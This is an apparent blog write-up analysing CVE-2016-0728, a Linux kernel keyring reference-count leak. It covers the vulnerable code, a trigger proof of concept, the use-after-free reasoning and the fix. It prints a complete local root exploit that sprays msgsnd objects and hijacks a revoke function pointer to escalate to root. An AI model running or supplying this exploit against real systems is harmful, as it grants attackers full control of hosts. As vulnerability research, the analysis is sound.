Before Anything

Well, vulnerability about ref-count overflow, sounds interesting, hum? But the pity is that this CVE is just a theoretical one which is hard to exploit (From my point of view). Nevertheless, we should get in touch with this kind of bug as well as related system, and comprehend the idea of how to hack that.

The kernel version used for this blog is 4.4.0. (Seems this bug is fixed at v4.4.1 version)

Pre-knowledge

Before dive in, we have to learn some basics of Linux keyring system. In the manual, short description is given.

keyrings - in-kernel key management and retention facility

The Linux key-management facility is primarily a way for various kernel components to retain or cache security data, authentication keys, encryption keys, and other data in the kernel. System call interfaces are provided so that user-space programs can manage those objects and also use the facility for their own purposes; see add_key(2), request_key(2), and keyctl(2). A library and some user-space utilities are provided to allow access to the facility. See keyctl(1), keyctl(3), and keyutils(7) for more information.

In addition, this old article gives further introduction about these APIs and functionality. Below links are also recommended to take a look

So far we can know that keyring is used for kernel to store important data objects. In addition, interface is also provided for user to manage their objects. Other aspects just be ignored here as what we focused is the bug.

The Bug Itself

The vulnerable code is located at function long join_session_keyring(const char *name) in /secruity/keys/process_keys.c

Before take a glance at the vulnerable source code, let me introduce what is join seesion keyring fisrt.

key_serial_t keyctl_join_session_keyring(const char *name); keyctl_join_session_keyring() changes the session keyring to which a process is subscribed. (manual)

In essence, for each process, it owns a session keyring since launching. To test it, try execute keyctl session to spawn a new shell. It will return you new session keyring ID.

# keyctl session new
Joined session keyring: 680549283
# keyctl show
Session Keyring
 680549283 --alswrv      0     0  keyring: new

What join_session_keyring aims to do is allow current process to subscribe an new session keyring with input key name. The kernel will search the list with your input name and create a new keyring if failed. Anyway, after join_session_keyring successfully finished, the session keyring of current process will be updated.

Hence, let us look at the vulnerable function, it is called by sys_keyctl defined in security/keys/keyctl.c, which is an exposed system call interface.

/*
 * Join the named keyring as the session keyring if possible else attempt to
 * create a new one of that name and join that.
 *
 * If the name is NULL, an empty anonymous keyring will be installed as the
 * session keyring.
 *
 * Named session keyrings are joined with a semaphore held to prevent the
 * keyrings from going away whilst the attempt is made to going them and also
 * to prevent a race in creating compatible session keyrings.
 */
long join_session_keyring(const char *name)
{
	/* ... */

	/* look for an existing keyring of this name */
	keyring = find_keyring_by_name(name, false);
	if (PTR_ERR(keyring) == -ENOKEY) {
		/* not found - try and create a new one */
		keyring = keyring_alloc(
			name, old->uid, old->gid, old,
			KEY_POS_ALL | KEY_USR_VIEW | KEY_USR_READ | KEY_USR_LINK,
			KEY_ALLOC_IN_QUOTA, NULL);
		if (IS_ERR(keyring)) {
			ret = PTR_ERR(keyring);
			goto error2;
		}
	} else if (IS_ERR(keyring)) {
		ret = PTR_ERR(keyring);
		goto error2;
	} else if (keyring == new->session_keyring) {
		/* Here means that the input name just match with old keyring */
		ret = 0;
		goto error2; 	// <== BUG HERE
	}
	/* ... */
	key_put(keyring);
okay:
	return ret;

error2:
	mutex_unlock(&key_session_mutex);
error:
	abort_creds(new);
	return ret;
}

The vulnerable point is located at line-798.

	} else if (keyring == new->session_keyring) {
		/* Here means that the input name just match with old keyring */
		ret = 0;
		goto error2; 	// <== BUG HERE
	}

When control flow arrives in this code block, it means that the name of key supplied by user is exactly match with current session keyring. That is to say no update is required, so the ret is set to 0. However, it directly jumps into error2 and forget one thing.

What it is?

	} else if (IS_ERR(keyring)) {
		ret = PTR_ERR(keyring);
		goto error2;
	} 

We can look up another branch where IS_ERR(keyring) is true, what that code block does is almost similar with the vulnerable code branch: they set the value of ret and jump to error2. It seems indeed make sense, how can bug occur?

To explain the forget thing here, we have to look above into find_keyring_by_name(). This function does not just find and return the keyring, it also increase the refcount of this keyring.

/*
 * Find a keyring with the specified name.
 *
 * All named keyrings in the current user namespace are searched, provided they
 * grant Search permission directly to the caller (unless this check is
 * skipped).  Keyrings whose usage points have reached zero or who have been
 * revoked are skipped.
 *
 * Returns a pointer to the keyring with the keyring's refcount having being  // <<== LOOK HERE
 * incremented on success.  -ENOKEY is returned if a key could not be found.
 */
struct key *find_keyring_by_name(const char *name, bool skip_perm_check)
{
	/* ... */
	if (keyring_name_hash[bucket].next) {
		/* search this hash bucket for a keyring with a matching name
		 * that's readable and that hasn't been revoked */
		list_for_each_entry(keyring,
				    &keyring_name_hash[bucket],
				    name_link
				    ) {
			/* ... */
			/* we've got a match but we might end up racing with
			 * key_cleanup() if the keyring is currently 'dead'
			 * (ie. it has a zero usage count) */
			if (!atomic_inc_not_zero(&keyring->usage))
				continue;
			/* ... */
			keyring->last_used_at = current_kernel_time().tv_sec;
			goto out;
		}
	}

	keyring = ERR_PTR(-ENOKEY);
out:
	read_unlock(&keyring_name_lock);
	return keyring;
}

So you know the answer when users ask for a session join with a keyring that is already subscribed for the process. It will error increase the ref-count of that keyring.

Triggering

The code for trigger this bug also quite clear.

#include <stddef.h>
#include <stdio.h>
#include <sys/types.h>
#include <keyutils.h>

int main(int argc, const char *argv[])
{
	int i = 0;
	key_serial_t serial;

	serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING,
			"leaked-keyring"); 	// first time, create this keyring
	if (serial < 0) {
		perror("keyctl");
		return -1;
	}
 	printf("create keyring: %d\n", serial);

	if (keyctl(KEYCTL_SETPERM, serial,
		   KEY_POS_ALL | KEY_USR_ALL) < 0) { 	// key permissions set
	// KEY_POS_ALL Grant the (view,read,write,search,link,setattr) permission to a process that possesses the key
	// KEY_USR_ALL Grant permissions to all same UID process
		perror("keyctl");						
		return -1;
	}

	for (i = 0; i < 100; i++) {
		serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, 	// keep triggerring
				"leaked-keyring");
		if (serial < 0) {
			perror("keyctl");
			return -1;
		}
	}

	return 0;
}

This POC code is supposed to increase the key with name “leaked-keyring” with extra 100 times. This can be verified by looking into /proc/key file.

# cat /proc/keys
1028f9de I--Q---     2 perm 1f3f0000     0 65534 keyring   _uid.0: empty
25a12564 I------     1 perm 1f030000     0     0 keyring   .id_resolver: empty
297781ea I--Q---     1 perm 1f3f0000     0 65534 keyring   _uid_ses.0: 1
33a188fa I------     1 perm 1f030000     0     0 keyring   .dns_resolver: empty
[    8.840313] cat (968) used greatest stack depth: 13648 bytes left
# ./poc
create keyring: 330089631
# cat /proc/keys
1028f9de I--Q---     2 perm 1f3f0000     0 65534 keyring   _uid.0: empty
13acc49f I--Q---   100 perm 3f3f0000     0     0 keyring   leaked-keyring: empty
25a12564 I------     1 perm 1f030000     0     0 keyring   .id_resolver: empty
297781ea I--Q---     1 perm 1f3f0000     0 65534 keyring   _uid_ses.0: 1
33a188fa I------     1 perm 1f030000     0     0 keyring   .dns_resolver: empty
[Serial][Flags][Usage][Expiry][Permissions][UID][GID][TypeName][Description] :[Summary]

After the POC is executed, we can find that the key named with leaked-keyring still exists (its process session is already over) and the ref-count is of value 100! Quite amazing…

Exploiting

The very direct effect of this vulnerability is DOS attack, as the session key is still kept by the kernel and cause waste of resource.

If there is any chance for a hacker to utilize this ref-count vulnerability to get further exploiting? And the answer is yes.

As you can see above in the POC code, a simple loop can lead to a 100 ref-count of the session keyring, what about a larger number? The data type for save the ref-count is atomic_t.

struct key {
	atomic_t		usage;		/* number of references */
	/* ... */
}

Good news! The atomic_t is always 32-bit length even in 64-bit architecture. Although increase the ref-count to 2^32 still quite crazy, it’s possible. After that, once the ref-count of this keyring object is reaching zero, like the double free sock in ping-pong root, the key object should be released, even if the current session is still alive.

That can further be exploited to a UAF bug if we can allocate a new controllable object into that release memory space.

In fact, the process of doing that puzzles me for quite a long time. As the allocation and release of the key object in source code is like below.

// secuirty/keys/key.c 
struct key *key_alloc(struct key_type *type, const char *desc,
		      kuid_t uid, kgid_t gid, const struct cred *cred,
		      key_perm_t perm, unsigned long flags)
{
	/* allocate and initialise the key and its description */
	key = kmem_cache_zalloc(key_jar, GFP_KERNEL);
	/* ... */
}
EXPORT_SYMBOL(key_alloc);

Oops, the key object’s allocation and releasing is handled by kmem_cache of key_jar. The first thing comes to me is that we cannot easily allocate another object into the old memory space through famous sendmsg spraying and key_add spraying. Because only the objects take charge by key_jar shall enter into the responded page. Another idea is physmap spraying, if the page containing the released key is freed by key_jar and passed to other kmem_cache or can be obtained through mmap, we can write malicious content into it. But is too hard as a long time is required even for releasing one in-use key, not to mention a total page of key objects.

Shame on me, deceived by the Linux memory management system once again… The fact is far simpler than we think.

void __init key_init(void)
{
	/* allocate a slab in which we can store keys */
	key_jar = kmem_cache_create("key_jar", sizeof(struct key),
			0, SLAB_HWCACHE_ALIGN|SLAB_PANIC, NULL);
	/* ... */

Through dynamic debugging the construction of the kmem_cache key_jar, I found that it will be intergrated into existing kmem_cache kmalloc-192 as cache alias optimization is enabled.

Last time I faced with cache alias pitfall is in ping-pong root. I found that the ping cache will be intergrated into another cache in 32-bit architecture, which results in a unstable slub states.

It is so lucky that the integrated kmem_cache is one of kmalloc pools. Thus, it will be quite possible to fetch the released key object and fill it with malicious content.

Now we can have a look at the origin exploit code.

/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */
/* $ ./cve_2016_072 PP_KEY */

/*修改第二次for循环次数*/
/*调整sleep时间*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <keyutils.h>
#include <unistd.h>
#include <time.h>

#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <fcntl.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

#define STRUCT_LEN (0xb8 - 0x30)
#define COMMIT_CREDS_ADDR (0xffffffff8106df50)
#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff8106e310)

struct key_type {
    char * name;
    size_t datalen;
    void * vet_description;
    void * preparse;
    void * free_preparse;
    void * instantiate;
    void * update;
    void * match_preparse;
    void * match_free;
    void * revoke;
    void * destroy;
};

void userspace_revoke(void * key) {
    commit_creds(prepare_kernel_cred(0));
}

int main(int argc, const char *argv[])
{
	const char 			*keyring_name;
	size_t				i = 0;
    unsigned long int	l = 0x100000000/2;
	key_serial_t		serial = -1;
	pid_t 				pid = -1;
    struct key_type 	*my_key_type = NULL;
    int					msqid;
	
	struct 
	{
		long mtype;
		char mtext[STRUCT_LEN];
	} msg = {0x4141414141414141, {0}};
	
	if (argc != 2) {
		puts("usage: ./keys <key_name>");
		return 1;
	}

    printf("uid=%d, euid=%d\n", getuid(), geteuid()); 
    commit_creds = (_commit_creds) COMMIT_CREDS_ADDR;
    prepare_kernel_cred = (_prepare_kernel_cred) PREPARE_KERNEL_CREDS_ADDR;
    
    my_key_type = malloc(sizeof(*my_key_type));
    my_key_type->revoke = (void*)userspace_revoke;	// backdoor function
	
    memset(msg.mtext, 'A', sizeof(msg.mtext));
	
    // key->uid
    *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */
	
    //key->perm
    *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;
	
    //key->type
    *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;
	
    if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
        perror("msgget");
        exit(1);
    }
	
    keyring_name = argv[1];
	
	/* Set the new session keyring before we start */
	serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);
	
	if (serial < 0) {
		perror("keyctl");
		return -1;
    }
	
	if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {
		perror("keyctl");
		return -1;
	}

	puts("Increfing...");
	
    for (i = 1; i < 0xfffffffd; i++) {
        if (i == (0xffffffff - l)) {
            l = l/2;
            sleep(5);
        }
        if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
            perror("keyctl");
            return -1;
        }
    }
	
    sleep(20);
	
    /* here we are going to leak the last references to overflow */
    for (i=0; i<3; ++i) {
        if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
            perror("keyctl");
            return -1;
        }
    }
	
    puts("finished increfing");
    puts("forking...");
	
    /* allocate msg struct in the kernel rewriting the freed keyring object */
    for (i = 0; i < 64;i++) {
        pid = fork();
		
        if (pid == -1) {
            perror("fork");
            return -1;
        }

        if (pid == 0) {
            sleep(2);
			
            if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
                perror("msgget");
                exit(1);
            }
			
            for (i = 0; i < 64; i++) {
                if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
                    perror("msgsnd");
                    exit(1);
                }
            }
			
            sleep(-1);
            exit(1);
        }
    }
    
    puts("finished forking");
    //sleep(5);
    
    /* call userspace_revoke from kernel */
    puts("caling revoke...");
    if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {
        perror("keyctl_revoke");
    }
    
    printf("uid=%d, euid=%d\n", getuid(), geteuid());
		
    execl("/bin/sh", "/bin/sh", NULL);
	
    return 0;
}

The idea of this exploit is to alter the key->revoke functon pointer to user-space malicious backdoor. The spraying method it adopts is msgsnd spraying, as it can allow a flexible length for kmalloc.

But here comes with the last question: Will this exploit work?

Theoretically speaking, everything should functions as we expect, but the fact is cruel. The long discussion under the official POC site reveals that this exploit didn’t take effect on many machines. And this program is highly possible to hang your machine or emulator.

One big reason for that is the mechanism of RCU. Check this blog for an overview.

In a nutshell, the precise state when the ref-count is zero is difficult to catch. In the function long join_session_keyring(const char *name), the prepare_creds() will first increase the ref-count of cred->session_keyring (exactly the keyring we target), the find_keyring_by_name() function, which we already discussed, will also increase the ref-count. Thus, +2 of ref-count happens. When this function is goind to end, the abort_cred() shall be called to decrease the ref-count by 1. However, this is done by RCU work. We have no idea when the drecreasings will happen (even though sleep() is called to wait them), so the start point to call msgsnd is very obscure. If we start it late, the object maybe already allocated to others.

And that is why I explain this bug “hard to exploit” in the very begining. I don’t know if or not there is any clever idea to solve the RCU problem, maybe a future work for me. For now, For now, I just feel sad waiting for the 2^32 ref-count overflow happens.

Patching

The patch for this vulnerability is quite simple. link

--- a/security/keys/process_keys.c
+++ b/security/keys/process_keys.c
@@ -794,6 +794,7 @@ long join_session_keyring(const char *name)
 		ret = PTR_ERR(keyring);
 		goto error2;
 	} else if (keyring == new->session_keyring) {
+		key_put(keyring);
 		ret = 0;
 		goto error2;
 	}

You forgot to call key_put, so call it this time.